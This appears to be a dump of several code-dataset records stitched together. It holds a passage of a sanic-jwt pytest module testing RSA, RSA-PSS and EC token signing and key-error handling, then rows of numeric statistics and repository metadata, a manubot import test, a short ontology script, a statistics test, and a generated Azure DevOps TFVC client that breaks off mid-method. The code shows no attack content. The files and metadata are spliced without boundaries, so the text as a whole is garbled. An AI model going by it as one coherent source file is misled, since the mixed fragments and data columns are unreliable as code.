app,
authenticate=authenticate,
public_key=public_ec_key,
private_key=private_ec_key,
algorithm="ES256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsa_crypto_from_fullpath_as_str(public_rsa_key, private_rsa_key):
app = Sanic()
class MyConfig(Configuration):
secret = str(public_rsa_key)
private_key = str(private_rsa_key)
class MyInitialize(Initialize):
configuration_class = MyConfig
sanicjwt = MyInitialize(app, authenticate=authenticate, algorithm="RS384")
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsapss_crypto_from_fullpath_as_str(
public_rsa_key, private_rsa_key
):
app = Sanic()
class MyConfig(Configuration):
secret = str(public_rsa_key)
private_key = str(private_rsa_key)
algorithm = "PS384"
class MyInitialize(Initialize):
configuration_class = MyConfig
sanicjwt = MyInitialize(app, authenticate=authenticate)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_ec_crypto_from_fullpath_as_str(public_ec_key, private_ec_key):
app = Sanic()
class MyConfig(Configuration):
secret = str(public_ec_key)
private_key = str(private_ec_key)
class MyInitialize(Initialize):
configuration_class = MyConfig
sanicjwt = MyInitialize(app, authenticate=authenticate, algorithm="ES384")
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsa_crypto_from_str(public_rsa_key, private_rsa_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
public_key=public_rsa_key.read_text(),
private_key=private_rsa_key.read_text(),
algorithm="RS512",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsapss_crypto_from_str(public_rsa_key, private_rsa_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
secret=public_rsa_key.read_text(),
private_key=private_rsa_key.read_text(),
algorithm="PS512",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_ec_crypto_from_str(public_ec_key, private_ec_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
public_key=public_ec_key.read_text(),
private_key=private_ec_key.read_text(),
algorithm="ES512",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_crypto_wrong_keys():
app = Sanic()
Initialize(
app,
authenticate=authenticate,
public_key=str(binascii.hexlify(os.urandom(48)), "utf-8"),
private_key=str(binascii.hexlify(os.urandom(48)), "utf-8"),
algorithm="RS256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 500
def test_jwt_crypto_very_long_path():
app = Sanic()
n = 16 * 1024
Initialize(
app,
authenticate=authenticate,
public_key=str(binascii.hexlify(os.urandom(n)), "utf-8"),
private_key=str(binascii.hexlify(os.urandom(n)), "utf-8"),
algorithm="RS256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 500
def test_jwt_crypto_missing_private_key(public_rsa_key):
with pytest.raises(exceptions.RequiredKeysNotFound):
Initialize(
Sanic(),
authenticate=lambda: True,
secret=public_rsa_key,
algorithm="RS256",
)
def test_jwt_crypto_invalid_secret():
with pytest.raises(exceptions.InvalidConfiguration):
Initialize(Sanic(), authenticate=lambda: True, secret=None)
with pytest.raises(exceptions.InvalidConfiguration):
Initialize(Sanic(), authenticate=lambda: True, public_key="")
with pytest.raises(exceptions.InvalidConfiguration):
Initialize(Sanic(), authenticate=lambda: True, secret=" ")
def test_jwt_crypto_invalid_public_key(public_rsa_key, private_rsa_key):
with pytest.raises(exceptions.RequiredKeysNotFound):
Initialize(
Sanic(),
authenticate=lambda: True,
public_key=public_rsa_key / "foo",
private_key=private_rsa_key,
algorithm="RS256",
)
def test_jwt_crypto_invalid_private_key(public_rsa_key, private_rsa_key):
with pytest.raises(exceptions.RequiredKeysNotFound):
Initialize(
Sanic(),
authenticate=lambda: True,
public_key=public_rsa_key,
private_key=private_rsa_key / "bar",
algorithm="RS256",
)
def test_jwt_crypto_invalid_both_keys(public_rsa_key, private_rsa_key):
with pytest.raises(exceptions.RequiredKeysNotFound):
Initialize(
Sanic(),
authenticate=lambda: True,
secret=public_rsa_key / "foo",
private_key=private_rsa_key / "bar",
algorithm="RS256",
)
| 26.236842
| 79
| 0.653042
| 1,358
| 11,964
| 5.498527
| 0.078792
| 0.032141
| 0.033748
| 0.056247
| 0.946297
| 0.9242
| 0.916968
| 0.912682
| 0.898219
| 0.8334
| 0
| 0.012921
| 0.223755
| 11,964
| 455
| 80
| 26.294505
| 0.791106
| 0
| 0
| 0.70679
| 0
| 0
| 0.092528
| 0
| 0
| 0
| 0
| 0
| 0.117284
| 1
| 0.061728
| false
| 0.033951
| 0.024691
| 0
| 0.17284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6af0db8d87e2163d60e9fc36e461fda738def54
| 212
|
py
|
Python
|
manubot/tests/test_imports.py
|
lasest/manubot
|
7d74055105f3ac19e27fb469779b045a8dbf0acf
|
[
"BSD-2-Clause-Patent"
] | 299
|
2019-02-07T23:40:29.000Z
|
2022-03-29T15:51:33.000Z
|
manubot/tests/test_imports.py
|
Junjun1guo/manubot
|
3ff3000f76dcf82a30694d076a4da95326e3f6ae
|
[
"BSD-2-Clause-Patent"
] | 181
|
2019-02-01T20:44:32.000Z
|
2022-03-22T21:24:16.000Z
|
manubot/tests/test_imports.py
|
Junjun1guo/manubot
|
3ff3000f76dcf82a30694d076a4da95326e3f6ae
|
[
"BSD-2-Clause-Patent"
] | 34
|
2019-05-21T15:03:25.000Z
|
2022-01-17T10:19:24.000Z
|
def test_imports():
import manubot.cite
import manubot.cite.arxiv
import manubot.cite.doi
import manubot.cite.pubmed
import manubot.cite.url
import manubot.process.manuscript
manubot
| 21.2
| 37
| 0.726415
| 27
| 212
| 5.666667
| 0.444444
| 0.509804
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.207547
| 212
| 9
| 38
| 23.555556
| 0.910714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| true
| 0
| 0.875
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e6bfe48c990b46309976a50ba0a71dfb309eec1d
| 282
|
py
|
Python
|
Creation/examples/phoros/create.py
|
OmarZOS/semantic-social-indexer
|
5051d4c5679afdef16f6515a231e621fbd02885e
|
[
"MIT"
] | null | null | null |
Creation/examples/phoros/create.py
|
OmarZOS/semantic-social-indexer
|
5051d4c5679afdef16f6515a231e621fbd02885e
|
[
"MIT"
] | 1
|
2022-03-17T23:15:19.000Z
|
2022-03-17T23:15:19.000Z
|
Creation/examples/phoros/create.py
|
OmarZOS/semantic-social-indexer
|
5051d4c5679afdef16f6515a231e621fbd02885e
|
[
"MIT"
] | null | null | null |
from classes.static.nodes.node import *
from classes.static.links.link import *
from classes.static.social_network.social_network import *
from properties.from_source import *
from properties.to_destination import *
from properties.part_of import *
TARGET_ONTOLOGY.save(onto_path)
| 31.333333
| 58
| 0.833333
| 40
| 282
| 5.7
| 0.525
| 0.219298
| 0.223684
| 0.201754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092199
| 282
| 9
| 59
| 31.333333
| 0.890625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e6c8ca3f7d174003ba2cc822724bb28cc248a84d
| 126
|
py
|
Python
|
geral/livro_data_science_do_zero/chapter5/test_mode.py
|
flaviogf/Cursos
|
2b120dbcd24a907121f58482fdcdfa01b164872c
|
[
"MIT"
] | 2
|
2021-02-20T23:50:07.000Z
|
2021-08-15T03:04:35.000Z
|
geral/livro_data_science_do_zero/chapter5/test_mode.py
|
flaviogf/Cursos
|
2b120dbcd24a907121f58482fdcdfa01b164872c
|
[
"MIT"
] | 18
|
2019-08-07T02:33:00.000Z
|
2021-03-18T22:52:38.000Z
|
geral/livro_data_science_do_zero/chapter5/test_mode.py
|
flaviogf/Cursos
|
2b120dbcd24a907121f58482fdcdfa01b164872c
|
[
"MIT"
] | 2
|
2020-09-28T13:00:09.000Z
|
2021-12-30T12:21:08.000Z
|
from example01 import mode, num_friends
def test_should_mode_return_100_and_49():
assert [100, 49] == mode(num_friends)
| 21
| 41
| 0.769841
| 20
| 126
| 4.45
| 0.7
| 0.157303
| 0.314607
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0.142857
| 126
| 5
| 42
| 25.2
| 0.712963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e6d410dceec255f941753c38b62345b8266b1c82
| 41,425
|
py
|
Python
|
vsts/vsts/tfvc/v4_0/tfvc_client.py
|
dhilmathy/azure-devops-python-api
|
d16026911f93361becb52d2f1c124d5c3e8a82e7
|
[
"MIT"
] | null | null | null |
vsts/vsts/tfvc/v4_0/tfvc_client.py
|
dhilmathy/azure-devops-python-api
|
d16026911f93361becb52d2f1c124d5c3e8a82e7
|
[
"MIT"
] | 37
|
2020-04-27T07:45:19.000Z
|
2021-04-05T07:27:15.000Z
|
vsts/vsts/tfvc/v4_0/tfvc_client.py
|
dhilmathy/azure-devops-python-api
|
d16026911f93361becb52d2f1c124d5c3e8a82e7
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...vss_client import VssClient
from . import models
class TfvcClient(VssClient):
"""Tfvc
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(TfvcClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '8aa40520-446d-40e6-89f6-9c9f9ce44c48'
def get_branch(self, path, project=None, include_parent=None, include_children=None):
"""GetBranch.
Get a single branch hierarchy at the given path with parents or children (if specified)
:param str path:
:param str project: Project ID or project name
:param bool include_parent:
:param bool include_children:
:rtype: :class:`<TfvcBranch> <tfvc.v4_0.models.TfvcBranch>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if include_parent is not None:
query_parameters['includeParent'] = self._serialize.query('include_parent', include_parent, 'bool')
if include_children is not None:
query_parameters['includeChildren'] = self._serialize.query('include_children', include_children, 'bool')
response = self._send(http_method='GET',
location_id='bc1f417e-239d-42e7-85e1-76e80cb2d6eb',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TfvcBranch', response)
def get_branches(self, project=None, include_parent=None, include_children=None, include_deleted=None, include_links=None):
"""GetBranches.
Get a collection of branch roots -- first-level children, branches with no parents
:param str project: Project ID or project name
:param bool include_parent:
:param bool include_children:
:param bool include_deleted:
:param bool include_links:
:rtype: [TfvcBranch]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if include_parent is not None:
query_parameters['includeParent'] = self._serialize.query('include_parent', include_parent, 'bool')
if include_children is not None:
query_parameters['includeChildren'] = self._serialize.query('include_children', include_children, 'bool')
if include_deleted is not None:
query_parameters['includeDeleted'] = self._serialize.query('include_deleted', include_deleted, 'bool')
if include_links is not None:
query_parameters['includeLinks'] = self._serialize.query('include_links', include_links, 'bool')
response = self._send(http_method='GET',
location_id='bc1f417e-239d-42e7-85e1-76e80cb2d6eb',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcBranch]', self._unwrap_collection(response))
def get_branch_refs(self, scope_path, project=None, include_deleted=None, include_links=None):
"""GetBranchRefs.
Get branch hierarchies below the specified scopePath
:param str scope_path:
:param str project: Project ID or project name
:param bool include_deleted:
:param bool include_links:
:rtype: [TfvcBranchRef]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if include_deleted is not None:
query_parameters['includeDeleted'] = self._serialize.query('include_deleted', include_deleted, 'bool')
if include_links is not None:
query_parameters['includeLinks'] = self._serialize.query('include_links', include_links, 'bool')
response = self._send(http_method='GET',
location_id='bc1f417e-239d-42e7-85e1-76e80cb2d6eb',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcBranchRef]', self._unwrap_collection(response))
def get_changeset_changes(self, id=None, skip=None, top=None):
"""GetChangesetChanges.
Retrieve Tfvc changes for a given changeset
:param int id:
:param int skip:
:param int top:
:rtype: [TfvcChange]
"""
route_values = {}
if id is not None:
route_values['id'] = self._serialize.url('id', id, 'int')
query_parameters = {}
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
response = self._send(http_method='GET',
location_id='f32b86f2-15b9-4fe6-81b1-6f8938617ee5',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcChange]', self._unwrap_collection(response))
def create_changeset(self, changeset, project=None):
"""CreateChangeset.
Create a new changeset.
:param :class:`<TfvcChangeset> <tfvc.v4_0.models.TfvcChangeset>` changeset:
:param str project: Project ID or project name
:rtype: :class:`<TfvcChangesetRef> <tfvc.v4_0.models.TfvcChangesetRef>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
content = self._serialize.body(changeset, 'TfvcChangeset')
response = self._send(http_method='POST',
location_id='0bc8f0a4-6bfb-42a9-ba84-139da7b99c49',
version='4.0',
route_values=route_values,
content=content)
return self._deserialize('TfvcChangesetRef', response)
def get_changeset(self, id, project=None, max_change_count=None, include_details=None, include_work_items=None, max_comment_length=None, include_source_rename=None, skip=None, top=None, orderby=None, search_criteria=None):
"""GetChangeset.
Retrieve a Tfvc Changeset
:param int id:
:param str project: Project ID or project name
:param int max_change_count:
:param bool include_details:
:param bool include_work_items:
:param int max_comment_length:
:param bool include_source_rename:
:param int skip:
:param int top:
:param str orderby:
:param :class:`<TfvcChangesetSearchCriteria> <tfvc.v4_0.models.TfvcChangesetSearchCriteria>` search_criteria:
:rtype: :class:`<TfvcChangeset> <tfvc.v4_0.models.TfvcChangeset>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if id is not None:
route_values['id'] = self._serialize.url('id', id, 'int')
query_parameters = {}
if max_change_count is not None:
query_parameters['maxChangeCount'] = self._serialize.query('max_change_count', max_change_count, 'int')
if include_details is not None:
query_parameters['includeDetails'] = self._serialize.query('include_details', include_details, 'bool')
if include_work_items is not None:
query_parameters['includeWorkItems'] = self._serialize.query('include_work_items', include_work_items, 'bool')
if max_comment_length is not None:
query_parameters['maxCommentLength'] = self._serialize.query('max_comment_length', max_comment_length, 'int')
if include_source_rename is not None:
query_parameters['includeSourceRename'] = self._serialize.query('include_source_rename', include_source_rename, 'bool')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query('orderby', orderby, 'str')
if search_criteria is not None:
if search_criteria.item_path is not None:
query_parameters['searchCriteria.itemPath'] = search_criteria.item_path
if search_criteria.author is not None:
query_parameters['searchCriteria.author'] = search_criteria.author
if search_criteria.from_date is not None:
query_parameters['searchCriteria.fromDate'] = search_criteria.from_date
if search_criteria.to_date is not None:
query_parameters['searchCriteria.toDate'] = search_criteria.to_date
if search_criteria.from_id is not None:
query_parameters['searchCriteria.fromId'] = search_criteria.from_id
if search_criteria.to_id is not None:
query_parameters['searchCriteria.toId'] = search_criteria.to_id
if search_criteria.follow_renames is not None:
query_parameters['searchCriteria.followRenames'] = search_criteria.follow_renames
if search_criteria.include_links is not None:
query_parameters['searchCriteria.includeLinks'] = search_criteria.include_links
response = self._send(http_method='GET',
location_id='0bc8f0a4-6bfb-42a9-ba84-139da7b99c49',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TfvcChangeset', response)
def get_changesets(self, project=None, max_comment_length=None, skip=None, top=None, orderby=None, search_criteria=None):
"""GetChangesets.
Retrieve Tfvc changesets Note: This is a new version of the GetChangesets API that doesn't expose the unneeded queryParams present in the 1.0 version of the API.
:param str project: Project ID or project name
:param int max_comment_length:
:param int skip:
:param int top:
:param str orderby:
:param :class:`<TfvcChangesetSearchCriteria> <tfvc.v4_0.models.TfvcChangesetSearchCriteria>` search_criteria:
:rtype: [TfvcChangesetRef]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if max_comment_length is not None:
query_parameters['maxCommentLength'] = self._serialize.query('max_comment_length', max_comment_length, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query('orderby', orderby, 'str')
if search_criteria is not None:
if search_criteria.item_path is not None:
query_parameters['searchCriteria.itemPath'] = search_criteria.item_path
if search_criteria.author is not None:
query_parameters['searchCriteria.author'] = search_criteria.author
if search_criteria.from_date is not None:
query_parameters['searchCriteria.fromDate'] = search_criteria.from_date
if search_criteria.to_date is not None:
query_parameters['searchCriteria.toDate'] = search_criteria.to_date
if search_criteria.from_id is not None:
query_parameters['searchCriteria.fromId'] = search_criteria.from_id
if search_criteria.to_id is not None:
query_parameters['searchCriteria.toId'] = search_criteria.to_id
if search_criteria.follow_renames is not None:
query_parameters['searchCriteria.followRenames'] = search_criteria.follow_renames
if search_criteria.include_links is not None:
query_parameters['searchCriteria.includeLinks'] = search_criteria.include_links
response = self._send(http_method='GET',
location_id='0bc8f0a4-6bfb-42a9-ba84-139da7b99c49',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcChangesetRef]', self._unwrap_collection(response))
def get_batched_changesets(self, changesets_request_data):
"""GetBatchedChangesets.
:param :class:`<TfvcChangesetsRequestData> <tfvc.v4_0.models.TfvcChangesetsRequestData>` changesets_request_data:
:rtype: [TfvcChangesetRef]
"""
content = self._serialize.body(changesets_request_data, 'TfvcChangesetsRequestData')
response = self._send(http_method='POST',
location_id='b7e7c173-803c-4fea-9ec8-31ee35c5502a',
version='4.0',
content=content)
return self._deserialize('[TfvcChangesetRef]', self._unwrap_collection(response))
def get_changeset_work_items(self, id=None):
"""GetChangesetWorkItems.
:param int id:
:rtype: [AssociatedWorkItem]
"""
route_values = {}
if id is not None:
route_values['id'] = self._serialize.url('id', id, 'int')
response = self._send(http_method='GET',
location_id='64ae0bea-1d71-47c9-a9e5-fe73f5ea0ff4',
version='4.0',
route_values=route_values)
return self._deserialize('[AssociatedWorkItem]', self._unwrap_collection(response))
def get_items_batch(self, item_request_data, project=None):
"""GetItemsBatch.
Post for retrieving a set of items given a list of paths or a long path. Allows for specifying the recursionLevel and version descriptors for each path.
:param :class:`<TfvcItemRequestData> <tfvc.v4_0.models.TfvcItemRequestData>` item_request_data:
:param str project: Project ID or project name
:rtype: [[TfvcItem]]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
content = self._serialize.body(item_request_data, 'TfvcItemRequestData')
response = self._send(http_method='POST',
location_id='fe6f827b-5f64-480f-b8af-1eca3b80e833',
version='4.0',
route_values=route_values,
content=content)
return self._deserialize('[[TfvcItem]]', self._unwrap_collection(response))
def get_items_batch_zip(self, item_request_data, project=None, **kwargs):
"""GetItemsBatchZip.
Post for retrieving a set of items given a list of paths or a long path. Allows for specifying the recursionLevel and version descriptors for each path.
:param :class:`<TfvcItemRequestData> <tfvc.v4_0.models.TfvcItemRequestData>` item_request_data:
:param str project: Project ID or project name
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
content = self._serialize.body(item_request_data, 'TfvcItemRequestData')
response = self._send(http_method='POST',
location_id='fe6f827b-5f64-480f-b8af-1eca3b80e833',
version='4.0',
route_values=route_values,
content=content,
accept_media_type='application/zip')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_item(self, path, project=None, file_name=None, download=None, scope_path=None, recursion_level=None, version_descriptor=None):
"""GetItem.
Get Item Metadata and/or Content for a single item. The download parameter is to indicate whether the content should be available as a download or just sent as a stream in the response. Doesn't apply to zipped content which is always returned as a download.
:param str path:
:param str project: Project ID or project name
:param str file_name:
:param bool download:
:param str scope_path:
:param str recursion_level:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: :class:`<TfvcItem> <tfvc.v4_0.models.TfvcItem>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
if download is not None:
query_parameters['download'] = self._serialize.query('download', download, 'bool')
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TfvcItem', response)
def get_item_content(self, path, project=None, file_name=None, download=None, scope_path=None, recursion_level=None, version_descriptor=None, **kwargs):
"""GetItemContent.
Get Item Metadata and/or Content for a single item. The download parameter is to indicate whether the content should be available as a download or just sent as a stream in the response. Doesn't apply to zipped content which is always returned as a download.
:param str path:
:param str project: Project ID or project name
:param str file_name:
:param bool download:
:param str scope_path:
:param str recursion_level:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
if download is not None:
query_parameters['download'] = self._serialize.query('download', download, 'bool')
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='application/octet-stream')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_items(self, project=None, scope_path=None, recursion_level=None, include_links=None, version_descriptor=None):
"""GetItems.
Get a list of Tfvc items
:param str project: Project ID or project name
:param str scope_path:
:param str recursion_level:
:param bool include_links:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: [TfvcItem]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
if include_links is not None:
query_parameters['includeLinks'] = self._serialize.query('include_links', include_links, 'bool')
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcItem]', self._unwrap_collection(response))
def get_item_text(self, path, project=None, file_name=None, download=None, scope_path=None, recursion_level=None, version_descriptor=None, **kwargs):
"""GetItemText.
Get Item Metadata and/or Content for a single item. The download parameter is to indicate whether the content should be available as a download or just sent as a stream in the response. Doesn't apply to zipped content which is always returned as a download.
:param str path:
:param str project: Project ID or project name
:param str file_name:
:param bool download:
:param str scope_path:
:param str recursion_level:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
if download is not None:
query_parameters['download'] = self._serialize.query('download', download, 'bool')
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
